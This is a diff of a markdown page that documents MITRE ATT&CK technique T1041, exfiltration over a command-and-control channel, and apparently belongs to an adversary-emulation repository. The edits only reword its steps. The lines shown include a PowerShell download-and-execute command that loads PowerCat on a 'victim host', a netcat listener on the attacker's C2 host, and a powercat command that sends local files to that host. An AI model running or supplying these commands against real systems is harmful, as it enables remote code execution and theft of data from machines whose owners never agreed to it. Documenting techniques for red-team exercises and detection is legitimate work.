--- a/Techniques/T1041/T1041.md
+++ b/Techniques/T1041/T1041.md
@@ -8,18 +8,18 @@
 # Details
 
 ## Using `PowerCat`
-* Load PowerCat in reverse shell:
+* Load PowerCat in command line on victim host:
 ```
 powershell
 IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
 ```
 * Start a listener on C2 host:
 ```
-nc -lvvp <listener-port-on-c2> > out.file
+nc -lvvp <port-of-C2> > out.file
 ```
 * Transfer local files to remote C2 host using `PowerCat`:
 ```
-powercat -c <ip-of-c2> -p <listener-port-on-c2> -i <path-of-local-files>
+powercat -c <ip-of-C2> -p <port-of-C2> -i <path-of-local-files>
 ```
 
 ## Using RAT
